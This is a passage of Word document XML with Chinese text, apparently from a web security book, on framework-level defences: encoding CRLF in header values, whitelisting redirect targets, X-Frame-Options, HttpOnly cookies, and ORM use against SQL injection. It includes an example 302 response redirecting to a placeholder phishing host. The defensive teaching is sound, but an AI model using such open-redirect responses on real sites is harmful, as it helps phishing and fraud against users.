          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="77"/>
        <w:ind w:left="203" w:right="125" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>因此对抗 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CRLF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>的方案只需要在“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>”中编码所有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>\r\n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>即可。这里没有提到在“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>中编码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-10"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>，是因为让用户能够控制“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-10"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>”是极其危险的事情，在任何情况下都不应该使其发生。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="158"/>
        <w:ind w:left="202" w:right="224" w:firstLine="401"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:45.133007pt;width:411.15pt;height:30pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4504;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="266" w:lineRule="auto" w:before="8"/>
                    <w:ind w:left="28" w:right="5294" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>HTTP/1.1 302 Moved Temporarily (...)</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="180" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>Location: </w:t>
                  </w:r>
                  <w:hyperlink r:id="rId79">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Courier New"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>http://www.phishing.tld</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>类似的，针对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>30X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>返回号的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP Response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>，浏览器将会跳转到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Location </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>指定的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>， 攻击者往往利用此类功能实施钓鱼或诈骗。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="72"/>
        <w:ind w:left="203" w:right="226" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>因此，对于框架来说，管理好跳转目的地址是很有必要的。一般来说，可以在两个地方做这件事情：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="202" w:right="221" w:firstLine="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t>如果 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>框架提供统一的跳转函数，则可以在跳转函数内部实现一个白名单，指定跳转地址只能在白名单中；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="202" w:right="164" w:firstLine="300"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>另一种解决方式是控制 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Location </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>字段，限制 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Location </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的值只能是哪些地址， 也能起到同样的效果，其本质还是白名单。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="155"/>
        <w:ind w:left="603"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>有很多与安全相关的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>Headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>，也可以统一在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>框架中配置。比如用来对抗 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ClickJacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:ind w:left="202"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>X-Frame-Options</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，需要在页面的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP Response </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中添加：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8396" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="165"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>X-Frame-Options:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>SAMEORIGIN</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t>框架可以封装此功能，并提供页面配置。该 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>头有三个可选的值：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>SAMEORIGIN</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>、</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DENY</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ALLOW-FROM origin</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，适用于各种不同的场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="153"/>
        <w:ind w:left="604"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>在前面的章节中，还曾提到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HttpOnly Flag</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，它能告诉浏览器不要让 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>访问该 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Session </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>劫持等问题上有着积极的意义，而且成本非常小。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="120" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>但并不是所有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
        </w:rPr>
        <w:t>服务器、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t>容器、脚本语言提供的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t>都支持设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HttpOnly Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>所以很多时候需要由框架实现一个功能：对所有的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>默认添加 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，不需要此功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
        </w:rPr>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>则单独在配置文件中列出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="156"/>
        <w:ind w:left="203" w:right="204" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>这将是非常有用的一项安全措施，在框架中实现的好处就是不用担心会有遗漏。就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HttpOnly Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>来说，它要求在所有服务器端设置该 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的地方都必须加上，这可能意味</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>着很多不同的业务和页面，只要一个地方有遗漏，就会成为短板。当网站的业务复杂时，登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>入口可能就有数十个，兼顾所有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Set-Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>页面会非常麻烦，因此在框架中解决将成为最好的方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="152"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>一般来说，框架会提供一个统一的设置 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>函数，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HttpOnly </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的功能可以在此函数中实现；如果没有这样的函数，则需要统一在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>返回头中配置实现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1060" w:val="left" w:leader="none"/>
          <w:tab w:pos="1061" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="1" w:after="0"/>
        <w:ind w:left="1060" w:right="0" w:hanging="857"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>数据持久层与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="301"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Object/Relation Mapping</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）框架对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>注入是有积极意义的。我们知道对抗</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="72"/>
        <w:ind w:left="203" w:right="223" w:hanging="1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>注入的最佳方式就是使用“预编译绑定变量”。在实际解决 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>注入时，还有一个难点就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>是应用复杂后，代码数量庞大，难以把可能存在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>注入的地方不遗漏地找出来，而 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>框架为我们发现问题提供了一个便捷的途径。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="156"/>
        <w:ind w:left="203" w:right="220" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:61.466011pt;width:411.15pt;height:60pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4528;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;select</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-44"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>id="User.getUser"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-44"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>parameterClass="cn.ibatis.test.User"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-44"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>resultClass="cn.ibatis. test.User"&gt;</w:t>
                  </w:r>
                </w:p>
